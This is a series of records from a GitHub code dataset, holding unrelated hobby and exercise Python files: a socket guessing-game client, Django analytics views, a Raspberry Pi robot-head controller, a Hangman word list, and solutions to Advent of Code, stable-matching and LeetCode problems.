'bar'])\r\nprint(pd.Timestamp.now())\r\n","repo_name":"okurumio/ML","sub_path":"pandas/pandas1.py","file_name":"pandas1.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31454106775","text":"import socket\ndef Main():\n host = '10.10.9.105'\n port = 5001\n client = True\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.connect((host, port))\n\n\n print(\"Connected\")\n # print(\"Welcome to Guess my number\")\n # print(\"I'm thinking of a number between 1 and 50. Please guess in few attempts possible.\")\n message = input(\"Enter your guess: Q for abort\")\n while message != 'Q':\n\n s.send(message.encode())\n data = s.recv(1024).decode()\n print(\"Received\" + str(data))\n val = data.split()\n if (val[0] == 'Correct' or val[0] == 'q'):\n s.send('Q'.encode())\n break\n message = input(\"-> \")\n s.close()\nif __name__ == '__main__':\n Main()","repo_name":"praneetha28/cnf","sub_path":"M9/clientupper.py","file_name":"clientupper.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2173526713","text":"from datetime import datetime\n\nfrom django.shortcuts import render\nfrom app.dal import app as appDAL\nfrom helpers import googleAnalytics\nfrom helpers import fbcampaigns\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\n\nGA_WEBSITE_VIEW_ID = \"ga:73399225\"\nGA_APP_VIEW_ID = \"ga:132813188\"\n\n# Create your views here.\n@login_required(login_url=settings.LOGIN_URL)\ndef get_ga_real_time_data(request):\n website_data = googleAnalytics.get_realtime_active_users(\n GA_WEBSITE_VIEW_ID)\n ga_app_data = googleAnalytics.get_realtime_active_users(GA_APP_VIEW_ID)\n\n total_website_users = website_data[\"totalsForAllResults\"][\"rt:activeUsers\"]\n website_geo_points = list()\n all_website_sources = list()\n if len(website_data[\"rows\"]) > 0:\n for tmpdata in website_data[\"rows\"]:\n if tmpdata[2] != '0.000000' and tmpdata[3] != '0.000000':\n website_geo_points.append({\n \"geo_coords\": [tmpdata[2], tmpdata[3]],\n \"city_name\": tmpdata[4],\n \"count\": tmpdata[5]\n })\n tmpdict = {\"device\": tmpdata[1],\n \"data\": {\n \"source\": tmpdata[0],\n \"latitude\": tmpdata[2],\n \"longitude\": tmpdata[3],\n \"city_name\": tmpdata[4],\n \"count\": tmpdata[5]\n }}\n all_website_sources.append(tmpdict)\n\n total_app_users = ga_app_data[\"totalsForAllResults\"][\"rt:activeUsers\"]\n app_geo_points = list()\n all_app_sources = list()\n if len(ga_app_data[\"rows\"]) > 0:\n for tmpdata in ga_app_data[\"rows\"]:\n if tmpdata[2] != '0.000000' and tmpdata[3] != '0.000000':\n app_geo_points.append({\n \"geo_coords\": [tmpdata[2], tmpdata[3]],\n \"city_name\": tmpdata[4],\n \"count\": tmpdata[5]\n })\n tmpdict = {\"device\": tmpdata[1],\n \"data\": {\n \"source\": tmpdata[0],\n \"latitude\": tmpdata[2],\n \"longitude\": tmpdata[3],\n \"city_name\": tmpdata[4],\n \"count\": tmpdata[5]\n }}\n all_app_sources.append(tmpdict)\n\n top_website_page_views = googleAnalytics.get_pageviews(GA_WEBSITE_VIEW_ID,\n datetime.now().strftime(\n \"%Y-%m-%d\"),\n datetime.now().strftime(\n \"%Y-%m-%d\"))\n\n # top_app_page_views = googleAnalytics.get_pageviews(GA_APP_VIEW_ID,\n # datetime.now().strftime(\n # \"%Y-%m-%d\"),\n # datetime.now().strftime(\n # \"%Y-%m-%d\"))\n\n orders_sold_per_minute = appDAL.get_orders_per_minutes(\n str(datetime.now().strftime(\"%Y-%m-%d\")) + 
\" 00:00:00\",\n str(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")),\n float(datetime.now().hour * datetime.now().minute))\n\n data_context = {\n \"website\": {\n \"total_users\": total_website_users,\n \"all_sources\": all_website_sources,\n \"top_page_views\": top_website_page_views,\n \"geo_points\": website_geo_points,\n },\n \"app\": {\n \"total_users\": total_app_users,\n \"all_sources\": all_app_sources,\n # \"top_page_views\": top_app_page_views,\n \"geo_points\": app_geo_points,\n },\n \"orders_sold_per_minute\": orders_sold_per_minute,\n }\n\n return render(request, \"app/realtime-data.html\", context=data_context)\n\n\n@login_required(login_url=settings.LOGIN_URL)\ndef get_ga_time_based_data(request):\n data_context = dict()\n if \"range\" in request.GET:\n datetime_range = request.GET.get(\"range\", None).split(\" - \")\n from_datetime = str(datetime.strptime(datetime_range[0].strip(),\n \"%Y-%m-%d %H:%M %p\").strftime(\n \"%Y-%m-%d %H:%M:%S\"))\n end_datetime = str(datetime.strptime(datetime_range[1].strip(),\n \"%Y-%m-%d %H:%M %p\").strftime(\n \"%Y-%m-%d %H:%M:%S\"))\n\n # fetching info now\n top_website_page_views = googleAnalytics.get_pageviews(\n GA_WEBSITE_VIEW_ID,\n datetime.now().strftime(\n \"%Y-%m-%d\"),\n datetime.now().strftime(\n \"%Y-%m-%d\"))\n google_analytics_website = googleAnalytics.get_insights(\n GA_WEBSITE_VIEW_ID,\n from_datetime[:10],\n end_datetime[:10])\n facebook_ads_data = fbcampaigns.insights(from_datetime[:10],\n end_datetime[:10])\n facebook_campaigns_data = fbcampaigns.campaigns_with_insights(\n from_datetime[:10], end_datetime[:10])\n top_retail_customers = appDAL.get_top_retail_customers(\n from_datetime,\n end_datetime,\n limit=10)\n top_products_sold = appDAL.get_top_products_sold(\n from_datetime,\n end_datetime,\n limit=10)\n top_customers_by_city = appDAL.get_top_customers_by_city(\n from_datetime,\n end_datetime,\n limit=10)\n top_sellers = appDAL.get_top_sellers(from_datetime,\n end_datetime,\n limit=10)\n top_sale_info = appDAL.get_top_sale_data(from_datetime,\n end_datetime,\n limit=10)\n\n website_converted_orders = list()\n # to get converted orders from website-google\n website_orders_by_campaigns = googleAnalytics.get_orders_by_campaigns(\n GA_WEBSITE_VIEW_ID, from_datetime[:10], end_datetime[:10],\n type=\"google\")\n for campaign_name, orders_list in website_orders_by_campaigns.items():\n converted_orders = appDAL.get_converted_orders(orders_list,\n from_datetime,\n end_datetime)\n website_converted_orders.append({\"type\": \"Google\",\n \"campaign_name\": campaign_name,\n \"converted_orders\": converted_orders})\n\n # to get converted orders from website-facebook\n website_orders_by_campaigns = googleAnalytics.get_orders_by_campaigns(\n GA_WEBSITE_VIEW_ID, from_datetime[:10], end_datetime[:10],\n type=\"facebook\")\n for campaign_name, orders_list in website_orders_by_campaigns.items():\n converted_orders = appDAL.get_converted_orders(orders_list,\n from_datetime,\n end_datetime)\n website_converted_orders.append({\"type\": \"Facebook\",\n \"campaign_name\": campaign_name,\n \"converted_orders\": converted_orders})\n\n orders_sold_per_minute = appDAL.get_orders_per_minutes(\n str(datetime.now().strftime(\"%Y-%m-%d\")) + \" 00:00:00\",\n str(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")),\n float(datetime.now().hour * datetime.now().minute))\n\n data_context = {\"data\": {\n \"top_retail_customers\": top_retail_customers,\n \"top_products_sold\": top_products_sold,\n \"top_customers_by_city\": top_customers_by_city,\n 
\"top_sellers\": top_sellers,\n \"orders_sold_per_minute\": orders_sold_per_minute,\n \"top_website_page_views\": top_website_page_views,\n \"google_analytics_website\": google_analytics_website,\n \"facebook_ads_data\": facebook_ads_data,\n \"facebook_campaigns_data\": facebook_campaigns_data,\n \"top_sale_info\": top_sale_info,\n \"website_converted_orders\": website_converted_orders,\n \"app_converted_orders\": website_converted_orders\n }\n }\n\n return render(request, \"app/data-info.html\", context=data_context)\n","repo_name":"arp19690/OC-Hackathon","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35606460835","text":"from threading import Thread\nimport time\nfrom time import sleep , perf_counter_ns # measures time in nano seconds\nimport speech_recognition as sr\nimport pyttsx3\nengine = pyttsx3.init()\nengine.setProperty('rate', 130)\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[3].id)\nengine.setProperty('volume',10)\nr=sr.Recognizer()\nmic=sr.Microphone(device_index=1)\n\nfrom board import SCL, SDA\nimport busio\nimport RPi.GPIO as GPIO\nfrom adafruit_motor import servo\nfrom adafruit_pca9685 import PCA9685\ni2c = busio.I2C(SCL, SDA)\npca = PCA9685(i2c)# Create a simple PCA9685 class instance.\npca.frequency = 50\nneckhor = servo.Servo(pca.channels[15])#head (30 to 160)\nneckver = servo.Servo(pca.channels[14])#head (0 to 110)\njaw = servo.Servo(pca.channels[13])#head (0 to 110)\n#oled = adafruit_ssd1306.SSD1306_I2C(128, 64, i2c, reset=reset_pin, addr=0x40)\n\n\n#GPIO SETUP\nchannel1 = 21 #right sensor pin number\nchannel2 = 20 #left sensor pin number\nchannel3 = 6 #front sebsor pin number\nchannel4 = 5 #down sensor pin number\nn=3\nGPIO.setmode(GPIO.BCM) #connection mode as BCM (\"Boardcom SOC channel\" change according to rasspbery's version number) \n\n#setting the sensors pins as inputs\nGPIO.setup(channel1, GPIO.IN )\nGPIO.setup(channel2, GPIO.IN )\nGPIO.setup(channel3, GPIO.IN )\nGPIO.setup(channel4, GPIO.IN )\n\n\n#giving the initial and normal angles for horizontal and vertical servoes\nnormal_angle_hor=100\nnormal_angle_ver=65\ncount_start=0 #initialize the counter\n\ndef order():\n global n\n global spoken\n t2 = Thread(target=move_jaw)\n t3 = Thread(target=say)\n spoken=\"can i help you\"\n t2.start()\n t3.start()\n while True:\n t2 = Thread(target=move_jaw)\n t3 = Thread(target=say)\n with mic as source:\n try:\n audio=r.listen(source)\n words= r.recognize_google(audio,language='en')\n t2 = Thread(target=move_jaw)\n t3=Thread(target=say)\n print (words)\n x=angle_hor\n if words == \"how are you\":\n n=10\n spoken =\"i am fine, well at least my head is fine, thank you\"\n t2.start()\n t3.start()\n elif words==\"meet the doctor\":\n n=9\n spoken='nice to meet you doctor, Please give them full marks'\n t2.start()\n t3.start()\n elif words==\"what's your name\":\n n=5\n spoken='my name is robot and you ?'\n t2.start()\n t3.start()\n elif words==\"turn left\":\n n=2\n spoken='at your service'\n t2.start()\n t3.start()\n sleep(1)\n neckhor.angle=150\n angle_hor=150\n sleep(1)\n elif words==\"turn back\":\n n=2\n spoken='at your service'\n t2.start()\n t3.start()\n sleep(1)\n neckhor.angle=x\n angle_hor=x\n elif words==\"can you help me\":\n n=3\n spoken='I am at your service'\n t2.start()\n t3.start()\n elif words==\"thank you\":\n n=3\n spoken='you are welcome'\n t2.start()\n t3.start()\n 
sleep(2)\n break\n elif (words.split()[0])==\"my\":\n z=words.split()\n n=3\n spoken=\"hello\"+z[-1]\n t2.start()\n t3.start()\n sleep(2)\n else:\n print(words)\n except:\n sr.UnknownValueError()\ndef say():\n global spoken\n engine.say(spoken)\n engine.runAndWait()\n\ndef turn_neck():\n global angle_hor\n global angle_ver\n global normal_angle_hor\n global normal_angle_ver\n h=normal_angle_hor #normal hor. angle (angle at which robot turned front in horizontal)\n v=normal_angle_ver #normal vertical angle (angle at which robot turned middle in vertical)\n if (angle_ver >=normal_angle_ver): #up\n if (angle_hor >=normal_angle_hor): #left\n while (True):\n neckhor.angle = h #always start from front \n neckver.angle = v #always start from middle\n sleep(0.03)\n if (h!=angle_hor):\n h=h+1\n if (v!=angle_ver):\n v=v+1\n if (h==angle_hor and v==angle_ver): # change angle till it reach to left up direction\n sleep(1)\n break\n elif(angle_hor <=normal_angle_hor): # if right up directon\n while (True):\n neckhor.angle = h #always start from front \n neckver.angle = v #always start from middle\n sleep(0.03)\n if (h!=angle_hor):\n h=h-1\n if(v!=angle_ver):\n v=v+1\n if (h==angle_hor and v==angle_ver): # change angle till it reach to righrt up direction\n sleep(1)\n break\n elif (angle_ver <=normal_angle_ver): #if down\n if (angle_hor >=normal_angle_hor): #if left \n while (True):\n neckhor.angle = h #always start from front \n neckver.angle = v #always start from middle\n sleep(0.03)\n if (h!=angle_hor):\n h=h+1\n if(v!=angle_ver):\n v=v-1\n if (h==angle_hor and v==angle_ver): # change angle till it reach to left down direction\n sleep(1)\n break\n elif(angle_hor <=normal_angle_hor): #if right down direction\n while (True):\n neckhor.angle = h #always start from front \n neckver.angle = v #always start from middle\n sleep(0.03)\n if (h!=angle_hor):\n h=h-1\n if(v!=angle_ver):\n v=v-1\n if (h==angle_hor and v==angle_ver): # change angle till it reach to right down direction\n sleep(1)\n break\n \ndef turn_neck_back():\n global normal_angle_hor\n global normal_angle_ver\n global angle_hor\n global angle_ver\n h=angle_hor #set the horizontal variable with with the current hor. angle from (turn_neck) function (start angle)\n v=angle_ver #set the vertical variable with with the current ver. angle from (turn_neck) function (start angle)\n if (angle_ver >=normal_angle_ver): #if neck is in up position currently from the (turn_neck) function\n if (angle_hor >=normal_angle_hor): #if neck is in left position currently from the (turn_neck) function \n while (True):\n neckhor.angle = h\n neckver.angle = v \n sleep(0.02)\n if (h!=normal_angle_hor):\n h=h-1\n if (v!=normal_angle_ver):\n v=v-1\n if (h==normal_angle_hor and v==normal_angle_ver): #change the hor.and ver. angles till they reach to normal (front middle) position\n sleep(1)\n break\n elif(angle_hor <=normal_angle_hor): #if neck is in righr up position currently from the (turn_neck) function \n while (True):\n neckhor.angle = h\n neckver.angle = v \n sleep(0.02)\n if (h!=normal_angle_hor):\n h=h+1\n if(v!=normal_angle_ver):\n v=v-1\n if (h==normal_angle_hor and v==normal_angle_ver): #change the hor.and ver. 
angles until they reach the normal (front middle) position\n                    sleep(1)\n                    break\n        elif(angle_hor <=normal_angle_hor): #if neck is currently in the right up position from the (turn_neck) function \n            while (True):\n                neckhor.angle = h\n                neckver.angle = v \n                sleep(0.02)\n                if (h!=normal_angle_hor):\n                    h=h+1\n                if(v!=normal_angle_ver):\n                    v=v-1\n                if (h==normal_angle_hor and v==normal_angle_ver): #change the hor. and ver. angles until they reach the normal (front middle) position\n                    sleep(1)\n                    break\n    elif (angle_ver <=normal_angle_ver): #if neck is currently in the down position from the (turn_neck) function \n        if (angle_hor >=normal_angle_hor): #if neck is currently in the left position from the (turn_neck) function \n            while (True):\n                neckhor.angle = h\n                neckver.angle = v \n                sleep(0.01)\n                if (h!=normal_angle_hor):\n                    h=h-1\n                if(v!=normal_angle_ver):\n                    v=v+1\n                if (h==normal_angle_hor and v==normal_angle_ver): #change the hor. and ver. angles until they reach the normal (front middle) position\n                    # sleep(1)\n                    break\n        elif(angle_hor <=normal_angle_hor): #if neck is currently in the right down position from the (turn_neck) function \n            while (True):\n                neckhor.angle = h\n                neckver.angle = v \n                sleep(0.01)\n                if (h!=normal_angle_hor):\n                    h=h+1\n                if(v!=normal_angle_ver):\n                    v=v+1\n                if (h==normal_angle_hor and v==normal_angle_ver): #change the hor. and ver. angles until they reach the normal (front middle) position\n#                    sleep(1)\n                    break\ndef move_jaw():\n    global n\n    for i in range (n):\n        jaw.angle = 60\n        sleep(0.2)\n        jaw.angle = 0\n        sleep(0.2)\n#............................................................................................................\n#function that takes the front,right,left,down capture arguments and sets the required vertical angle\ndef callback(front,right,left,down):\n    global count_start\n    global angle_ver\n    global angle_hor\n    if (angle_ver!=25 and angle_ver!=50): #if the down sensor detected the signal first (then ver. angle is already given)\n        diff=perf_counter_ns()-count_start #calculates the difference in time between the up and down sensor's signals\n    \n    if ((front==1 or right==1 or left==1 )and down==0): #up \n        while (GPIO.input(channel4)==0 and (diff<555555)): #wait for the down sensor signal, or stop once the time difference exceeds 555555\n            diff=perf_counter_ns()-count_start #keep on capturing the difference in time between the up and down sensor's signals \n        if (diff>555555 or diff>300000): #the while loop exited because 555555 was exceeded, or the down signal was detected after 111111\n            print (\"count=\" ,diff)\n            print (\"Sound Detected up!\")\n            angle_ver=120 \n        elif (diff<300000 and diff>33333): #the while loop exited because the down signal was detected between 111111 and 55555 time difference\n            print (\"count=\" ,diff)\n            print (\"Sound Detected middle!\")\n            angle_ver=normal_angle_ver \n        else: #the while loop exited because the down signal was detected in less than 55555 difference 
#function that takes the front, right, left and down capture arguments and sets the required vertical angle\ndef callback(front,right,left,down):\n    global count_start\n    global angle_ver\n    global angle_hor\n    if (angle_ver!=25 and angle_ver!=50): #if the down sensor detected the signal first (then the ver. angle is already given)\n        diff=perf_counter_ns()-count_start #calculate the difference in time between the up and down sensors' signals\n        \n        if ((front==1 or right==1 or left==1 )and down==0): #up \n            while (GPIO.input(channel4)==0 and (diff<555555)): #wait for the down sensor signal, or until the 555555 ns time difference is exceeded\n                diff=perf_counter_ns()-count_start #keep capturing the difference in time between the up and down sensors' signals \n            if (diff>555555 or diff>300000): #if the while loop exited because 555555 was exceeded, or the down signal arrived after 300000 ns\n                print (\"count=\" ,diff)\n                print (\"Sound Detected up!\")\n                angle_ver=120 \n            elif (diff<300000 and diff>33333): #if the while loop exited because the down signal arrived between 33333 and 300000 ns\n                print (\"count=\" ,diff)\n                print (\"Sound Detected middle!\")\n                angle_ver=normal_angle_ver \n            else: #if the while loop exited because the down signal arrived in less than 33333 ns\n                print (\"count=\" ,diff)\n                print (\"Sound Detected down 45!\")\n                angle_ver=40 \n        elif ((front==1 or right==1 or left==1 ) and down==1): #if both the up and down sensors fired at the same time\n            print (\"count=\" ,diff)\n            print (\"Sound Detected down 45!11\")\n            angle_ver=40\n    turn_neck() #at this step both the horizontal and vertical angles are set and ready to be used in the (turn_neck) function\n    print (angle_hor , angle_ver)\n    \n\n\ndef hor_detect(right ,left ,front): #this function takes the captured (right, left, front) arguments and sets the required horizontal angle\n    global angle_hor\n    ff=1 #flag that detects whether the counter finished before the front sensor's signal arrived \n    if (right==1 and left==0 and front==0 ): #if the right sensor detected the sound first\n        print (\"right\" )\n        angle_hor=50\n    elif (right==0 and left==1 and front==0 ): #if the left sensor detected the sound first\n        print (\"left\")\n        angle_hor=150\n    elif (right==0 and left==0 and front==1 ): #if the front sensor detected the sound first\n        print (\"front1\")\n        angle_hor=normal_angle_hor\n    elif (right==1 and left==1 and front==0 ): #if the right & left sensors detected the sound at the same time\n        print (\"front2\")\n        angle_hor=normal_angle_hor\n    elif (right==1 and left==1 and front==1 ): #if the right & left & front sensors detected the sound at the same time\n        print (\"front3\")\n        angle_hor=normal_angle_hor\n    elif (right==1 and left==0 and front==1 ): #if the right & front sensors detected the sound at the same time\n        print (\"right 45\")\n        angle_hor=80\n    elif (right==0 and left==1 and front==1 ): #if the left & front sensors detected the sound at the same time\n        print (\"left 45\")\n        angle_hor=130\n    elif (right==0 and left==0 and front==0 ): #if no signal is detected\n        print (\"zero break\")\n    callback(front,right,left,down) #call the function that sets the ver. angle, since the distance between the ver. sensors > the hor. sensors\n    \n#.........................................................................................................\n\n
while True:\n    \n    neckver.angle = normal_angle_ver #set the initial middle vertical angle\n    neckhor.angle=normal_angle_hor #set the initial front horizontal angle \n    sleep(2)\n    print(\"start\")\n    angle_ver=normal_angle_ver\n    #capture the right & left & front & down sensor states at the beginning of each cycle\n    right=GPIO.input(channel1) \n    left=GPIO.input(channel2)\n    front=GPIO.input(channel3)\n    down=GPIO.input(channel4)\n    while (right ==0 and left==0 and front==0 and down==0): #(polling) wait for a signal from the right/left/front/down sensors (wait for any sound )\n        right=GPIO.input(channel1)\n        left=GPIO.input(channel2)\n        front=GPIO.input(channel3)\n        down=GPIO.input(channel4)\n    if (down==1): # if the down sensor detected the signal first (the sound source is down )\n        count_start=perf_counter_ns() #start counting time by taking a time capture, used later for getting the time difference (diff)\n        while (right==0 and left==0 and front==0 ): # now wait for any signal from the upper horizontal sensors\n            right=GPIO.input(channel1)\n            left=GPIO.input(channel2) # if only the down sensor was detected\n            front=GPIO.input(channel3)\n            down=GPIO.input(channel4)\n        \n        print (\"Sound Detected down !\" )\n        angle_ver=25\n    count_start=perf_counter_ns() #start counting time by taking a time capture, used later for getting the time difference (diff) \n    hor_detect(right ,left ,front) #call the function that sets the horizontal angle\n    order()\n    sleep(0.3)\n    turn_neck_back() #call the function that turns the robot's head back to the normal (front middle) position\n#    sleep(0.5)    \n    print (\"..............\")  \nt1 = Thread(target=order)\nt2 = Thread(target=move_jaw)\nt3 = Thread(target=say)","repo_name":"aly1khaled1911/InMoov-Head","sub_path":"head.py","file_name":"head.py","file_ext":"py","file_size_in_byte":14899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"36794423895","text":"#List of words for use in Hangman game.\nwords = [\"aardvark\", \n         \"baboon\", \n         \"camel\", \n         \"distracted\", \n         \"element\", \n         \"fiction\",\n         \"gamble\",\n         \"hesitate\",\n         \"island\",\n         \"joker\",\n         \"laughing\",\n         \"meditate\",\n         \"neuron\",\n         \"opulent\",\n         \"programming\",\n         \"quilt\",\n         \"ridiculous\",\n         \"simple\",\n         \"traversal\",\n         \"ubiquitous\",\n         \"vulnerable\",\n         \"welcome\",\n         \"xray\",\n         \"zebra\"\n]","repo_name":"Tr-Heath/PythonTutorials","sub_path":"Day7/wordlist.py","file_name":"wordlist.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12868990921","text":"#!/usr/bin/env python3\n\nwith open(\"day10_input\") as fh:\n    nav = [line.strip() for line in fh.readlines()]\n\ndelimiter = {'(': ')', '[': ']', '{': '}', '<': '>'}\nopening = delimiter.keys()\npoints = {')': 3, ']': 57, '}': 1197, '>': 25137}\napoints= {')': 1, ']': 2, '}': 3, '>': 4}\nscore = 0\nascores = []\n\nfor n in nav:\n    stack = []\n    for c in n:\n        if c in opening: # opening character\n            stack.append(delimiter[c]) # add the matching closing character to the stack\n        elif c == stack[-1]: # closing character matches the one on the stack\n            stack.pop()\n        else: # closing character does not match the one on the stack\n            score += points[c]\n            break # done with this line\n    else:\n        ascore = 0\n        while stack: # incomplete line\n            ascore = 5 * ascore + apoints[stack.pop()]\n        if ascore > 0: # don't add a score if the line is complete and correct\n            ascores.append(ascore)\n\nprint(f\"Part 1: Syntax error score: {score}\")\nprint(f\"Part 2: autocomplete score: {sorted(ascores)[len(ascores)//2]}\")\n
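# (editor's note, not in the original) Tiny worked example of the autocomplete\n# scoring above: for the incomplete line \"[({\" the stack ends as [']', ')', '}'],\n# and popping gives ascore = ((0*5 + 3)*5 + 1)*5 + 2 = 82.\n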
","repo_name":"SnoozeySleepy/AdventofCode2021","sub_path":"day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"17959156936","text":"#You are given each man's and woman's preference lists. Given these lists, find a stable matching, meaning that\r\n#there do not exist two man-woman pairs (m1, w1), (m2, w2) such that w2 is ranked higher on m1's preference list\r\n#than w1 and simultaneously m1 is ranked higher on w2's preference list than m2 (so that both m1 and w2 would\r\n#prefer to change partner).\r\n\r\n\r\ndef GS (listfromtest):\r\n    W = [] #list of women\r\n    inputlist = [int(x) for x in listfromtest.split()]\r\n    peopleamount = inputlist.pop(0) # how many males/females we have - also the preference-list length\r\n    M = [inputlist[x:x+peopleamount + 1] for x in range (0, len(inputlist), peopleamount + 1) ] # split input into sublists and gradually move sublists into W\r\n    \r\n    for i in range (1,peopleamount +1):\r\n        for val in M: \r\n            if val[0] == i:\r\n                W.append(M.pop(M.index(val)))\r\n                W[-1].pop(0)\r\n                break\r\n    for male in M:\r\n        male.pop(0)\r\n    \r\n    #now men and women have pref lists in order in M, W\r\n\r\n    for Woman in W: #invert the list\r\n        inverselist = []\r\n        for index in range(1,peopleamount+1):\r\n            for i in range (0, peopleamount):\r\n                if index == Woman[i]:\r\n                    inverselist.append(i)\r\n        W[W.index(Woman)] = inverselist\r\n    \r\n\r\n    unmarried = M\r\n    married = [-1 for i in range(peopleamount)] #married is a list of the women currently married to the man at each index\r\n    while -1 in married: #while some man has no woman\r\n        for male in unmarried: #for each male in unmarried \r\n            indexofman = unmarried.index(male) #index \r\n            if married[indexofman] == -1: #if he is not married, we want to propose\r\n                perfectgirl = male[0]\r\n                if perfectgirl in married:\r\n                    Whatshethinksofproposer = W[perfectgirl][indexofman]\r\n                    Whatshethinksofhusband = W[perfectgirl][married.index(perfectgirl)]\r\n                if perfectgirl not in married: #if his pref is not married\r\n                    married[indexofman] = male.pop(0) #his pref is added to his married spot and removed from his pref list, as there is no point in trying again\r\n                elif Whatshethinksofproposer>Whatshethinksofhusband:\r\n                    married[married.index(perfectgirl)] = -1\r\n                    married[unmarried.index(male)] = perfectgirl\r\n                else:\r\n                    male.pop(0)\r\n    \r\n    print (*married, sep='\\n')\r\ncontents = []\r\nwhile True:\r\n    try:\r\n        line = input()\r\n    except EOFError:\r\n        break\r\n    contents.append(line)\r\nlistToStr = ' '.join([str(elem) for elem in contents])\r\n#GS('2 1 1 2 1 2 1 2 2 1 2 1 2 ')\r\n#GS('4 4 2 1 4 3 1 3 2 4 1 1 1 4 3 2 2 2 4 3 1 3 1 2 4 3 3 4 3 1 2 4 3 2 4 1 2 1 3 2 4')\r\n#GS('10 5 9 4 3 1 5 8 2 6 10 7 1 3 1 9 2 8 5 10 6 7 4 7 8 2 7 4 9 10 1 5 3 6 9 10 1 5 7 8 3 9 4 6 2 4 5 2 8 9 4 6 3 7 1 10 7 3 7 2 6 8 4 5 1 9 10 10 10 7 6 4 2 8 5 9 3 1 3 7 8 2 10 3 5 9 6 1 4 6 10 9 7 1 3 2 4 8 6 5 1 2 9 5 1 10 8 4 6 7 3 8 2 9 4 8 7 6 10 1 3 5 6 1 10 9 5 4 3 2 8 7 6 4 6 2 8 7 10 3 5 9 1 4 2 10 1 7 5 6 8 3 2 4 9 2 7 1 8 3 2 9 4 6 10 5 3 7 9 2 10 5 8 4 6 1 3 9 5 3 7 2 10 1 6 4 9 8 10 4 9 8 7 3 5 6 1 2 10 5 5 8 7 3 9 2 1 10 4 6 8 9 8 5 3 6 7 2 1 4 10')\r\nGS(listToStr)\r\n
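# (editor's note, not in the original) Input format, as this script parses it:\r\n# the first integer is n, followed by 2n whitespace-separated records of n+1\r\n# integers each (an id in 1..n, then a preference list). For each id, the\r\n# first record seen is treated as the woman's list and the later one as the\r\n# man's. The commented test GS('2 1 1 2 1 2 1 2 2 1 2 1 2 ') encodes n=2; the\r\n# output prints, one per line, the woman matched to each man index.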
\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"jonte1346/DataStructures","sub_path":"stablemarriage.py","file_name":"stablemarriage.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7877026110","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @FileName :981. Time Based Key-Value Store.py\n# @Time :11/5/21 11:13 AM\n# @Author :Eason Tang\nclass TimeMap:\n\n def __init__(self):\n self.dict = {}\n\n def set(self, key: str, value: str, timestamp: int) -> None:\n if key not in self.dict:\n self.dict[key] = []\n if key in self.dict:\n self.dict[key].append((timestamp, value))\n\n def get(self, key: str, timestamp: int) -> str:\n if key in self.dict:\n nums = self.dict[key]\n target = timestamp\n idx = self.binarysearch(nums, target)\n return self.dict[key][idx][1] if idx >= 0 else \"\"\n return \"\"\n\n def binarysearch(self, nums, target):\n lo = 0\n hi = len(nums) - 1\n while lo <= hi:\n mid = (lo + hi) // 2\n if nums[mid][0] > target:\n hi = mid - 1\n elif nums[mid][0] < target:\n lo = mid + 1\n else:\n return mid\n return hi\n\n\n# Your TimeMap object will be instantiated and called as such:\n# obj = TimeMap()\n# obj.set(key,value,timestamp)\n# param_2 = obj.get(key,timestamp)\nobj = TimeMap()\nobj.set(\"love\", \"high\", 10)\nobj.set(\"love\", \"low\", 20)\nparam_3 = obj.get(\"love\", 5)\nparam_3 = obj.get(\"love\", 15)\nprint(param_3)\n","repo_name":"tangyisheng2/leetcode-note","sub_path":"code/981. Time Based Key-Value Store.py","file_name":"981. Time Based Key-Value Store.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18918962447","text":"from django.urls import path\n\nfrom soteria.orgs.views.location import LocationListCreateAPI\nfrom soteria.orgs.views.location_detail import LocationDetailGetUpdateAPI\nfrom soteria.orgs.views.organization import OrganizationCreateAPI\nfrom soteria.orgs.views.organization_detail import OrganizationDetailGetUpdateAPI\nfrom soteria.orgs.views.organization_invite import OrganizationInviteAcceptAPI\nfrom soteria.orgs.views.organization_member import OrganizationMemberListCreateAPI\nfrom soteria.orgs.views.orgnization_member_detail import OrganizationMemberGetUpdateDeleteAPI\nfrom soteria.orgs.views.user_organization import UserOrganizationListAPI\n\nurlpatterns = [\n path(\"api/v1/organizations/\", OrganizationCreateAPI.as_view(), name=\"create-organizations\"),\n path(\n \"api/v1/me/organizations/\",\n UserOrganizationListAPI.as_view(),\n name=\"user-organizations-list\",\n ),\n path(\n \"api/v1/organizations/<uuid:organization_id>/\",\n OrganizationDetailGetUpdateAPI.as_view(),\n name=\"organization-details\",\n ),\n path(\n \"api/v1/organizations/<uuid:organization_id>/locations/\",\n LocationListCreateAPI.as_view(),\n name=\"organization-locations\",\n ),\n path(\n \"api/v1/organizations/<uuid:organization_id>/locations/<uuid:location_id>/\",\n LocationDetailGetUpdateAPI.as_view(),\n name=\"organization-location-details\",\n ),\n path(\n \"api/v1/organizations/<uuid:organization_id>/members/\",\n OrganizationMemberListCreateAPI.as_view(),\n name=\"organization-members\",\n ),\n path(\n \"api/v1/organizations/members/accept-invite/\",\n OrganizationInviteAcceptAPI.as_view(),\n name=\"organization-member-accept-invite\",\n ),\n path(\n \"api/v1/organizations/<uuid:organization_id>/members/<uuid:member_id>/\",\n 
